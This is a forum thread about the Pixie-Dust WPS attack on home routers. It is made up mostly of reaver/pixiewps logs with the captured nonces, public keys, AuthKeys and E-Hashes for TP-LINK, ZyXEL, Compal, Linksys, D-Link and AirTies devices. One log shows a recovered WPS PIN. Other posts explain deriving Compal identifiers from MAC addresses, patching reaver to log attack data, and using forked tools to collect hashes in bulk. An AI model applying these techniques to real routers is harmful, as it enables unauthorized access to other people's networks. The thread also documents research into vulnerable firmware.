Now, I have information about the F8:1A:67:XX:XX:XX MAC address (RTL 8671 ev 2006 07 27 chipset of TP-LINK modems).
These MAC addresses are masks... F8:1A:67 is the mask, FA:1A:67 the original MAC.
Nope. Don't know if this is ISP/country specific, but (again) all tested routers have the same PIN.
Here is the User-Manual, the WPS Menu is described on page 50.
if it's any use for anyone
TP-LINK TL-WR841ND v8.x
WI1 chip1: Atheros AR9341
Code:
[P] E-Nonce: b0:74:6b:86:dd:ed:47:b7:63:2b:4c:12:12:d5:c1:4e
[P] PKE: cb:8b:ce:5a:3e:49:e1:f6:02:75:c2:cb:c4:cd:bb:48:1e:a0:e8:ea:95:85:c3:62:6c:c1:ec:e3:58:01:54:8b:55:f2:34:59:34:4a:3d:22:26:44:76:42:60:b8:a2:41:40:38:db:17:b1:0d:92:81:f5:c2:31:b4:d9:b1:50:41:70:5b:ce:58:34:3c:83:7a:99:26:66:da:be:6b:ab:87:45:ea:2a:b3:11:9a:b0:de:73:df:9f:65:24:3d:75:cd:f7:63:8a:d7:9f:21:ae:60:63:fd:1c:0a:62:e1:6c:63:cc:4a:63:1a:aa:e3:28:c5:88:d7:7e:49:53:1b:be:7a:2c:d7:2c:1b:bf:72:74:29:3e:5a:77:e7:ad:55:bd:84:6b:dd:0a:56:81:ce:e4:10:d0:ab:16:9a:2a:f8:bc:92:52:30:4f:f1:74:9e:48:fd:2e:ea:01:de:f9:96:3d:75:67:c5:74:53:c2:37:06:13:8e:5f:c5:59:15:28:15:dc
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 8.0
[P] WPS Model Serial Number: 1.0
[+] Received M1 message
[P] PKR: 5c:a1:2f:f5:aa:4f:24:c2:c4:9b:b1:75:23:0b:66:63:50:d0:d3:33:7e:6d:28:01:1d:13:e4:04:d6:22:1b:a8:51:d9:33:fe:26:a6:00:f2:b0:b6:ef:fd:ea:8f:00:f9:23:ac:4a:a1:ec:ad:86:56:cf:62:2d:ea:74:f6:02:47:5f:e2:05:1c:19:2b:26:e0:33:fb:aa:3e:cc:e7:5f:4e:5f:f1:4f:c6:ff:71:ef:79:e1:ae:df:9c:4e:44:15:16:90:09:88:ba:0c:86:8e:87:12:13:d9:f6:ca:ac:d8:2b:be:41:8f:56:59:1b:12:22:16:e0:17:69:ee:9c:ce:c8:e4:b7:ca:1f:9c:71:8f:b0:2f:0e:c2:7d:80:41:ec:ed:d5:7c:d1:e8:0f:1d:36:0d:19:48:f1:71:e8:51:d4:31:87:d4:25:47:d9:2b:05:a6:44:0e:19:8c:fa:a9:96:3e:78:95:65:16:87:b3:7f:98:92:da:15:9c:5f:f5:44:f2
[P] AuthKey: 6d:ad:39:70:41:85:d1:99:b2:c2:be:62:67:7b:2e:cb:be:ff:b2:d1:23:e3:63:0a:fb:1d:6c:75:ad:9b:82:84
[+] Sending M2 message
[P] E-Hash1: 3b:1c:a3:7d:df:eb:90:b0:af:20:bd:72:82:6a:ab:01:3e:93:39:22:10:ff:a2:07:59:c3:ba:00:31:3a:3c:f5
[P] E-Hash2: ae:a5:9e:bc:13:53:aa:ce:7f:38:27:50:33:72:1a:c7:53:17:a1:59:12:57:e2:df:95:23:a0:4c:80:09:16:cd
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 1 s
Zyxel Keenetic vulnerable
unknown chipset
Code:
[P] E-Nonce: 18:31:5b:b2:69:e3:1a:c1:55:8f:e5:6d:7d:41:9b:3b
[P] PKE: 71:51:cd:92:d8:61:05:50:1e:15:15:6b:f1:a9:d8:5b:49:cf:a0:9e:9d:00:2a:7a:21:91:94:0e:ac:15:d3:44:58:2f:c8:61:3d:ce:f8:48:da:f6:ff:68:c2:8b:b5:20:61:e1:5d:8c:f2:57:60:a7:8f:3a:32:bf:69:5f:24:cc:e4:70:33:7f:12:3d:c6:88:02:ea:78:6b:9d:64:3f:b0:9d:68:65:e4:25:4e:e3:26:ab:73:ae:ea:b2:1c:6d:c6:b9:99:e0:7c:ea:18:56:3a:86:90:6e:78:a6:ea:6c:f6:6e:04:96:39:ef:04:2e:30:bc:96:c6:9f:1d:50:eb:82:a8:77:b6:b0:7b:43:bc:a6:57:75:62:93:64:7e:15:9d:14:96:e2:4c:9e:3c:71:31:ad:b9:e6:f5:5e:fe:98:85:ab:9e:3c:b3:d4:4d:5b:76:b6:f0:74:7b:ca:8c:d7:45:cc:b3:e6:93:a8:43:f8:1b:aa:f2:8c:35:47:68:cc:1b
[P] WPS Manufacturer: ZyXEL Communications Corp.
[P] WPS Model Number: KEENETIC series
[P] WPS Model Serial Number: none
[+] Received M1 message
[P] PKR: 62:dd:72:61:8b:fe:85:22:81:e5:2f:33:0f:e7:07:c3:a1:97:62:d7:69:7a:7d:dd:c6:1d:af:cf:f4:b5:83:31:42:6a:21:69:ec:d5:0a:15:16:ee:76:bf:9f:a7:fb:01:dd:64:ee:c7:42:41:f9:25:dd:ee:2c:88:9a:1e:3e:fa:a1:bb:97:8d:4a:33:25:d4:ff:f1:83:93:fe:98:c8:6a:90:2a:b0:f3:76:aa:6a:31:d5:18:16:dd:75:93:b9:e3:b9:39:4e:c8:ce:01:82:58:14:30:d8:92:af:6d:b4:69:29:ec:4b:52:e7:83:5c:3d:ae:a8:73:38:55:ac:87:76:85:c3:e8:8e:bd:ff:d9:b0:c1:3b:06:37:89:6e:ec:2b:75:24:1f:89:56:6d:79:27:9f:c9:02:00:32:b7:71:cf:ec:08:af:bc:ff:46:1f:aa:7d:c6:d6:bf:8d:b0:d2:ac:a9:02:ba:88:45:69:fc:81:fb:59:eb:15:bb:4a:23:44
[P] AuthKey: 9d:25:78:e1:27:48:12:fa:97:5f:aa:6f:3a:68:d2:86:3f:62:ec:c7:51:a1:df:02:87:f9:48:fd:56:fc:67:08
[+] Sending M2 message
[+] Received M1 message
[P] E-Hash1: 3e:08:b5:6b:9b:bd:cd:2e:07:b6:0b:76:ba:99:97:1a:f4:d9:38:11:09:f4:af:8c:3c:cd:dd:19:94:d7:b4:a7
[P] E-Hash2: c4:39:a8:b6:3b:67:80:32:0f:1c:62:f7:40:d8:4d:85:9f:02:e7:fc:5a:4a:85:a6:e8:8f:5b:0d:aa:55:b0:09
[Pixie-Dust]
[Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] PSK1: 7a:a9:99:5e:00:60:98:fd:91:37:2c:e9:f4:1c:67:11
[Pixie-Dust][*] PSK2: ce:81:5a:1b:39:ce:c3:07:86:59:21:71:0c:f4:a6:31
[Pixie-Dust] [+] WPS pin: 19048185
Sorry for the off-topic, I've got further information about Compal:
MAC-Address 5C:35:3B:xx:xx:xx
cbn–zyy–xxx-xxx
Serial-Number: NNNNNxxxxxxxxx
In my 8 cases, "N" is 53059. (Convert this number (with leading zero) to HEX and you get 353B, part of the MAC address.)
The other 9 numbers "x" are the last 6 letters of the MAC address in decimal.
And cbn should be something like „Compal Broadband Network“.
Later last day I've got two Compal models with MAC address (DC:53:7C), each of them has a different PIN:
AND HERE:
Code:
[P] E-Nonce: 00:b1:56:19:7a:47:6b:c8:28:93:26:7b:73:87:41:43
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: f2:60:5d:f8:f9:f6:51:7b:50:12:9d:96:2d:67:45:96:40:57:9b:65:54:b0:37:45:c7:4d:e8:8b:0b:ee:4e:8a:c0:74:6c:15:e6:26:8b:a8:b2:e3:9b:61:29:c9:26:83:a7:35:2b:e2:84:e3:e3:6c:d5:40:a0:5e:49:37:66:95:4a:a8:9d:c2:e0:cd:7e:72:ac:52:48:1b:86:bb:47:9b:f9:d9:c8:b2:4b:12:0b:58:35:f1:2e:93:48:fa:38:2e:9c:5e:cd:a4:be:ba:f2:cf:e7:e0:e4:ba:bb:20:12:f1:c4:a0:8a:9c:02:ed:54:ac:26:a0:25:9a:b5:55:ad:92:ef:07:a8:09:c4:f1:38:36:c5:65:8c:98:70:cd:3e:ac:4f:76:79:90:64:f2:55:59:8e:8c:76:95:15:51:28:7d:f7:b8:b7:01:10:f4:48:a2:84:b1:20:f1:90:4a:4b:c8:af:23:58:de:5d:64:12:e8:ab:35:46:f2:4b:00:bb:3c
[P] AuthKey: 57:0f:2c:2d:b9:96:9a:ca:96:07:fd:86:c3:f2:b2:cd:7d:27:9b:d3:b4:a5:5b:89:65:62:3a:8a:51:a8:74:57
[P] E-Hash1: 2e:c6:22:b4:6e:cf:d7:cb:ec:bf:b1:bc:d1:91:76:75:a6:6a:84:52:3c:55:48:b1:cf:e2:27:da:e8:0c:c5:70
[P] E-Hash2: e6:28:3f:35:de:2d:a3:bd:4a:88:bc:2b:27:fa:24:22:58:0b:b9:ca:83:ba:75:dc:dd:6c:aa:81:5e:ce:61:e4
Code:
[P] E-Nonce: 10:7b:c3:b1:65:cd:d7:fb:75:48:55:18:1c:3e:00:fc
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: cf:bc:97:7a:fe:b1:27:2c:4e:95:da:d1:92:87:01:70:8d:e3:f1:cc:f8:6c:1d:e6:26:23:c9:62:67:e0:37:71:8b:77:8b:c1:f4:ce:12:7b:f9:fb:0f:27:6f:78:99:77:27:2b:70:ce:b5:c9:41:d3:dd:07:d8:78:fc:d7:7d:45:2d:b9:f5:e2:33:40:67:20:66:68:12:0f:66:b3:bd:8b:e9:4e:57:f5:ca:ea:91:11:7a:fb:2c:bd:05:f5:59:ec:4e:5e:10:a5:04:20:59:bd:04:c5:6c:d1:28:7c:03:e5:c2:5c:ec:15:b9:98:e0:65:e8:07:2e:3f:f0:b7:05:29:a9:ad:a5:c6:f8:1c:a5:30:f0:1b:ea:d2:bb:23:c7:1b:e3:b4:0e:dd:65:a9:d2:98:4d:e8:28:bd:fa:ba:fe:dc:66:b5:ed:28:86:e1:59:97:f9:d9:4a:93:1f:fe:cb:86:30:c4:12:54:a1:cf:16:dc:e8:5d:9e:15:aa:a5:6c:bf
[P] AuthKey: 3c:1c:17:cb:bf:d0:e9:c0:95:c2:ef:64:04:64:c6:94:0a:c3:45:7d:f3:66:89:1e:69:9e:4f:a2:d0:6c:a3:6b
[P] E-Hash1: 24:ba:d7:f0:b9:7e:24:ae:f8:57:28:13:26:61:56:3d:67:6e:02:2f:8d:50:df:74:89:53:50:91:70:e9:b1:64
[P] E-Hash2: a6:ad:3b:e8:e0:ed:1c:06:9c:cc:4b:0b:f1:79:b6:af:f5:69:ef:97:ca:78:1e:01:68:1d:22:54:6f:57:d4:f1
NOT VULNERABLE:
Linksys WRT120n
Atheros AR9285
Code:
[P] E-Nonce: 6f:e3:4f:8b:e4:83:08:41:8d:5e:b8:98:cc:71:f2:8f
[P] PKE: f3:d3:80:1b:b8:f7:00:01:74:bb:3f:8d:dc:bc:17:ee:5f:e1:0e:c5:c3:ad:23:43:29:ad:b6:bc:7b:97:84:86:a2:ed:20:f9:5a:a6:72:64:1d:51:b9:da:7b:5d:e8:34:9b:a3:36:05:f1:6c:c4:8c:54:37:74:ed:d3:36:9e:e4:cc:08:e4:92:c6:ed:0f:e1:f1:c4:b8:36:bb:9d:03:97:01:89:ff:62:ce:2e:3f:38:1e:8d:fb:f1:85:9d:af:b5:16:99:ad:51:d5:03:d8:c3:77:f2:00:8c:7e:02:09:77:ef:31:58:33:13:da:3e:35:b4:67:77:ff:04:60:5f:fe:e5:0b:ff:a2:e3:fd:06:86:c1:b7:f8:bd:1b:a5:d9:45:c7:e4:d2:8e:20:99:66:4b:b3:62:0d:66:cc:ed:11:6b:d8:5c:fb:7b:1f:46:c9:7c:ae:e1:00:f1:e9:70:6b:69:22:bf:19:d8:e7:42:67:30:61:cb:f6:ad:9e:4e:44:84
[P] PKR: c5:b0:0a:28:4d:ba:ad:2f:05:ce:53:76:fa:fc:98:32:4a:ff:75:59:22:6e:06:aa:1f:15:be:48:bc:44:55:66:98:ea:a0:9d:d3:81:bd:df:53:55:6a:55:f0:68:63:1c:6a:b5:53:5a:3a:a6:5a:12:54:1f:82:4a:f0:7e:1a:9c:15:96:dd:0c:7b:e1:fa:ea:c1:e8:cc:5f:e0:0b:24:47:ee:1e:a8:84:d1:06:80:ea:e3:24:ac:40:66:29:7c:ae:79:66:42:00:c8:82:4a:b1:c9:a4:3a:04:34:b6:42:dc:4a:81:79:c1:40:c6:95:80:ff:75:60:2a:1a:62:da:a6:b2:c4:68:19:56:77:1f:0a:70:22:fe:3a:76:ac:ba:1d:9d:5b:2d:12:6b:a5:d5:18:7a:bb:5a:d4:3f:f2:59:6f:ca:f6:2b:5b:3b:f8:f1:92:e2:a7:57:4e:f5:f0:7a:a3:31:6d:6b:52:2a:85:84:71:51:c0:b2:11:7d:db:fc:15
[P] AuthKey: 81:fd:7e:7a:3a:53:76:0b:65:f9:1e:e9:fb:a1:1a:89:c4:98:b3:57:cb:1f:60:69:52:4e:6d:dc:2b:1f:6b:b2
[P] E-Hash1: a6:e9:dc:2d:19:d6:fe:e8:39:32:d9:83:69:b5:25:49:79:b8:70:27:4d:9b:b4:a1:93:e4:17:0c:36:9e:a0:fe
[P] E-Hash2: b7:73:33:9d:69:d8:d0:e0:fe:5c:1c:b1:a6:8c:41:a4:61:5e:57:3b:d0:92:86:96:e2:db:f5:e7:bf:56:fa:c5
D-Link 615 B2
Atheros AR5416/Atheros AR2122
Code:
[P] E-Nonce: 6e:e4:ae:67:c5:46:86:65:6d:ab:0a:c9:90:2a:89:cb
[P] PKE: e2:4b:6c:da:3b:c9:9c:0a:1f:97:52:69:d4:55:2a:5e:85:fb:35:bd:f8:d1:47:a3:d3:53:5e:28:b8:ca:74:8f:0c:c2:8d:4c:18:f8:52:16:54:ee:da:bf:1d:c3:c4:15:a4:0d:24:96:a9:95:b2:28:d7:ec:a2:87:f8:b4:70:24:fc:aa:c7:33:bb:fd:b2:e8:ef:7a:df:07:70:d6:df:2c:8b:dd:d1:3b:f7:fa:1d:cc:53:35:a4:99:d8:77:41:dd:2e:7e:c4:2a:37:4d:6d:59:90:f5:ed:30:d7:93:82:cf:22:2b:9d:95:08:3d:cc:bf:cd:78:99:66:ac:a8:81:7f:32:33:63:ae:b6:16:f1:d4:e1:10:3f:08:64:f8:86:72:da:c6:97:53:f0:c7:07:c4:0e:2c:c7:48:30:cc:0b:f0:ba:27:8d:5c:39:4d:68:cd:3c:b3:19:13:03:7a:be:4d:b1:19:bd:f0:83:f8:40:88:82:c9:ee:94:7a:43:8d:2f
[P] PKR: 15:e1:31:80:df:2b:44:9a:9a:21:58:00:42:75:e9:22:23:ea:96:66:04:e0:0c:12:96:20:a4:51:55:59:2f:ac:ad:bf:e5:c6:60:30:3e:fd:fa:62:b0:cd:f9:26:e7:2a:c7:69:80:97:ce:f0:ec:6d:03:bb:c5:d2:44:f1:d4:bd:88:be:8f:e2:e7:69:42:10:21:9d:8d:da:d6:d9:58:c7:48:8c:80:4c:25:76:c4:d8:5b:6d:25:8d:d1:1e:08:ab:10:2b:c0:73:af:7e:a6:c0:0f:8c:4c:61:54:8f:11:fc:18:51:e5:af:62:c8:19:12:2e:6e:84:0f:35:ad:9b:d6:21:f7:31:f1:00:6e:55:df:5b:ac:67:cd:1a:36:7c:14:de:f6:e1:01:14:d1:e5:88:78:6c:9a:7a:0e:24:bb:b1:82:97:c9:06:1b:66:7f:50:41:d6:e6:80:e3:28:a7:b9:47:1b:1e:cf:0b:92:da:f8:50:92:94:de:fa:2e:6c:82
[P] AuthKey: 68:4a:a0:f1:48:81:32:6a:ec:22:e7:2d:4a:ff:4c:97:42:6c:f4:5c:1c:78:2f:05:73:bd:d4:e3:eb:9b:3a:e4
[P] E-Hash1: 2e:dc:77:bf:39:09:1a:44:a4:1d:45:28:12:64:c1:7d:ca:9e:f4:40:89:44:05:14:10:32:dc:b5:f7:73:24:c3
[P] E-Hash2: 26:4f:77:c9:c9:3e:34:a3:80:c4:07:b8:83:2a:66:a2:51:04:cd:e6:0f:6a:97:7a:4f:21:37:81:51:04:1e:1f
1. Which is the best tool for automated hash collection. Something we could use to gather hashes to send off for analysis, possibly find new holes for pixiewps.
2. Are hashes from locked routers corrupt - no good for analysis?
3. Also any update on Realtek attack?
1.
The best way is simply to save a *.cap file with the PROBES and M messages and to add a *.txt file with the output of modified reaver.
In the case that the chipset and/or the model/manufacturer doesn't appear fully/directly in the probes/stdout of modified reaver, please add this information manually.
2.
They are not corrupted but you need to get m1-m2 and m3 and you will not get this full sequence on a locked router (until it is unlocked again).
3.
Do you know how to "disassemble" firmware? I am stuck and need some help. I found something very interesting on unsupported Realtek, in parts that can be disassembled easily with binwalk from Craig Heffner.
Basically there is a little *.sh script on startup that generates 4 things (or checks if these four things have been generated correctly and generates them if that is not the case), and one of them is the default WPS PIN.
On these devices the PIN is permanent/unconfigurable http://pix.toile-libre.org/upload/or...1430055858.png
Help would be appreciated
Gonna take a look at wireshark, try and figure it out.
Quote:
The best way is simply to save a *.cap file with the PROBES and M messages
kcdtv, appreciate the responses -very interesting.
Hope someone is developing a tool to automate the process, for noobs. If made easy for noobs like me, we can help build the data collection pool.
I use a modified reaver-src. If I set the -o $logfile switch, reaver writes only the pixie-data in the logfile:
For AuthKey make the following changes:
change:
Code:
wps_common.c: printf("[P] AuthKey: ");
to:
Code:
wps_common.c: cprintf(VERBOSE, "[P] AuthKey: ");
and add a new line in wps_common.c (under #include "wps_dev_attr.h") with:
Code:
#include "../misc.h"
And for messages you don't need (here the M1 received msg):
replace:
Code:
exchange.c: cprintf(VERBOSE, "[+] Received M1 message\n");
with:
Code:
exchange.c: printf("[+] Received M1 message\n");
I'll search with grep for all reaver messages, and change everything which is not important for the output-file.
Not the perfect way, but it works ;)
I do have a fork of autopixiewps I modified a while back that does hash collection, and then also produces a shell script. I'll update my fork in my github repo (github user name: d8tahead).
It saves generic reaver output of model info, collects hashes, and produces a shell script for the corresponding hashes with pixiewps, and gives each segment an ID#.
edit:
The one in my repo is a little old, I'll update it soon
will post asap
Edit #2:
I had to strip out some things from the code, but it should still work fine :)
autopixie has been updated in my repo:
https://github.com/d8tahead/AutoPixieWps
and you will need the new reaver t6x fork ( i added addition of R-Nonce for future pixiewps ) :
https://github.com/t6x/reaver-wps-fork-t6x
for my fork of autopixiewps for the hash gathering, you will need to enable option #5 on the main menu before the wash scan ( pixiehash gathering mode ).
also please note that the logs will be saved as essid and bssid and the prefix of PixieHash in the executing directory!
so be sure to cd to whichever directory you would like the hashes to be saved if executing from a shell.
remember to make autopixiewps.py executable!
After your last update reaver doesn't work: pixiewps: invalid option -- 'm'
ISSUE: ??
I looked at all pixie test posts in this thread... Some modems are invulnerable because the manufacturer and WPS model numbers are FALSE!
Example :
WPS Manufacturer: TPLINK
WPS Model Number: 1
Tplink uses Realtek and Atheros chipset...
True value:
WPS Manufacturer: Atheros
WPS Model Number: WR740..
Other example:
WPS Manufacturer: Realtek Semiconductor,
WPS Model Number: EV-2006-07-27...
Not "EV-2006-07-27" model number, true value: RTL8671
Can someone please tell me how to make reaver delay between sending M1 and M2?
Dependencies
Code:
sudo apt-get install libssl-dev
sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev
Couldn't get libssl-dev, it's forbidden in the repository as Kali is unable to update.
I'm running the latest live version but still can't get the package.
pixie is unable to install without ssl.
help me......
What fixes, improvements will pixiewps 1.1 bring?
How did you get this PIN ?
I will try it later this week because I'm travelling right now.
Thank you.
Sounds good. Great work everybody involved.
Got my first belkin today. first pin generated was the correct one.
With pixie dust or the pin generator? Model number?
with the -W1 option. :o
Hi, soxrok... I see APs on Wireshark... And there is a problem... Pixie sees wrong values... Look at the screenshots...
http://imgur.com/XslVDB6
Code:
Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 07:34:36:3e:4a:0e:38:df:e7:cd:fa:15:85:92:9e:71
[P] PKE: 0d:da:3b:db:55:f3:68:cf:55:2b:98:93:18:0a:f4:77:28:58:3d:45:25:58:0a:35:f0:5c:b3:89:7e:3e:3a:f9:dc:49:0a:dd:7f:f0:bb:61:3d:20:8a:fb:d7:d7:17:d0:fa:94:ad:26:5a:8d:70:9e:a1:3c:7f:cb:69:9c:a1:a7:f7:b5:d7:bf:6b:d4:fb:7c:e4:51:fb:f9:6b:9c:ef:5b:94:6c:7d:7a:4e:40:11:49:83:3d:bb:84:2a:cc:23:f9:3c:63:7f:af:70:4b:28:33:ea:f5:f5:05:38:19:76:09:8c:6a:8b:37:9e:27:ec:63:96:c1:f4:ab:23:27:d9:57:30:3b:b9:9d:55:e9:76:5d:81:5c:07:b4:8c:90:0c:02:37:9c:2f:f7:2d:6f:5b:b2:a0:4f:ee:9a:88:a1:1f:f4:3f:bd:78:6f:d5:8a:48:6f:fe:c7:b7:c2:da:9e:68:b8:35:0e:3e:e5:f3:4d:e1:4b:5f:b0:08:c9:d4:9e:a7:93
[P] WPS Manufacturer: AirTies Wireless Networks
[P] WPS Model Number: 1.0.2.0
[P] Access Point Serial Number: AT1731434014674
[+] Received M1 message
[P] PKR: 07:a0:3b:9f:28:60:17:1f:38:52:9e:7e:0b:5f:ef:04:62:15:b6:86:05:cb:4b:ee:f4:64:4f:a1:fd:35:da:3e:54:a6:26:c7:93:2a:b5:00:1c:e7:81:37:58:e8:ec:d1:fb:08:3a:f3:44:53:64:a1:41:02:25:ed:41:87:a5:85:aa:c6:98:87:7c:41:8f:a0:e6:96:0b:52:b3:bf:18:05:00:18:16:f0:4c:12:41:e1:bc:ca:e5:12:d0:67:2a:99:cb:04:2f:bb:21:22:9b:99:38:13:5b:ed:44:52:4e:f8:35:81:9f:98:63:f7:98:d9:6a:6f:a2:e8:3b:71:13:cd:e4:6a:b9:3e:51:d2:43:7f:a1:eb:7f:6a:74:5b:06:b2:29:55:5e:c9:27:36:a9:d7:1a:e0:3e:78:35:63:68:33:10:8c:44:64:96:86:96:03:74:d8:59:df:47:03:26:e3:5c:5b:93:18:ac:71:39:29:c5:4e:98:ef:3e:77:73:6a
[P] AuthKey: 99:58:17:50:f0:15:e3:c8:aa:75:c0:0f:fe:47:d7:b8:e8:f7:bf:af:9d:8a:64:91:74:1c:6f:36:21:1d:72:d5
[+] Sending M2 message
[P] E-Hash1: 80:3f:98:56:4f:6c:f7:64:bf:e9:39:9a:d9:39:24:04:7b:b4:84:44:48:81:6a:6b:e3:ba:c5:ee:86:c5:d1:32
[P] E-Hash2: 79:d2:d0:6a:0e:12:82:d8:ae:9f:32:aa:21:95:07:ef:45:12:78:a6:ba:60:c2:aa:24:a2:db:b2:ca:51:8b:bb
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 2 s
[Pixie-Dust]
http://imgur.com/fnrrZUn
Code:
Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 6a:34:66:5e:16:2c:db:cb:5b:11:f7:cc:78:a3:a0:c9
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] PKR: 19:fc:9c:fb:93:99:c3:5b:96:d8:d1:71:92:2e:64:89:85:5e:b8:c2:51:cc:f0:3d:e5:87:ef:8a:4d:5b:fd:63:bb:4d:ac:1d:d5:fd:ec:a6:ab:f2:35:80:33:bc:c9:61:4f:f5:6b:51:ce:1c:64:dd:c8:e2:a2:aa:98:5d:b0:8c:fe:90:1f:db:fb:a1:13:ec:55:29:4f:3e:49:3a:80:62:4d:fe:77:9e:6e:78:25:5f:5d:30:8f:34:20:2a:28:82:2f:08:23:af:86:79:29:1c:be:e8:75:af:c8:a7:e9:90:52:2a:15:cd:49:21:c0:00:62:91:3e:1e:94:11:55:92:28:54:81:89:f9:af:99:b8:f4:7a:29:80:0a:92:69:18:63:97:5f:85:73:51:af:9b:63:fb:a3:dc:0e:7d:eb:2b:23:3d:8b:4f:50:e5:eb:9b:bc:7e:d6:2b:21:93:09:52:6b:8a:71:d0:33:31:6c:82:01:f3:ee:85:77:97:2c:ae
[P] AuthKey: 2b:da:97:bc:a7:06:a8:e9:94:6e:ff:f3:70:e3:84:8d:ec:48:ad:b0:ba:49:74:6b:a0:31:93:db:ac:71:9a:09
[+] Sending M2 message
[P] E-Hash1: 88:a0:55:ea:db:12:db:0d:f4:61:91:5c:3f:e7:11:07:6d:5a:1f:57:b2:7e:fc:6e:34:29:3f:2a:de:56:c8:74
[P] E-Hash2: 97:c4:d6:06:29:db:a1:bf:4c:e9:96:c2:ee:6f:dd:e6:df:b6:30:c1:20:68:e5:2e:d2:ef:d6:82:43:38:31:b6
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 2 s
[Pixie-Dust]
http://imgur.com/1MrIW4K
Code:
Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: da:42:7d:5e:4c:b6:a3:98:b5:f3:41:77:42:8e:a6:d8
[P] PKE: c6:bc:d8:bc:9a:be:0e:e3:ef:06:dd:55:bc:07:79:1b:56:32:76:fd:63:b9:b1:84:a6:6a:fe:ec:98:d8:d1:ae:62:fe:23:e1:c1:93:39:81:5a:ff:69:56:32:28:12:3e:2b:de:7a:d6:79:93:0a:b2:3a:fd:35:e2:03:2b:e7:4b:08:fc:81:76:c9:46:1a:8b:96:1a:f3:bf:85:99:f8:fb:d3:b5:91:a9:96:92:ad:fd:90:17:45:a6:34:9a:01:9f:a0:df:4d:a3:d4:0e:38:bc:79:b2:9e:38:c2:7b:5e:8c:97:b9:23:89:6c:91:e1:ae:82:bf:f0:86:06:ff:11:da:30:14:dc:39:28:c6:51:07:05:a3:b0:50:93:5b:50:44:8a:5f:19:e8:a7:2c:86:22:21:b4:2a:11:40:e7:e8:53:e5:0d:7f:b1:90:a2:01:c7:7a:5e:65:2a:cc:13:7d:3b:3c:00:67:00:ee:66:40:93:7e:7d:c9:0b:d8:62:fc:37
[P] WPS Manufacturer: ZyXEL
[P] WPS Model Number: P-660W-T1 v3
[P] Access Point Serial Number: 00000001
[+] Received M1 message
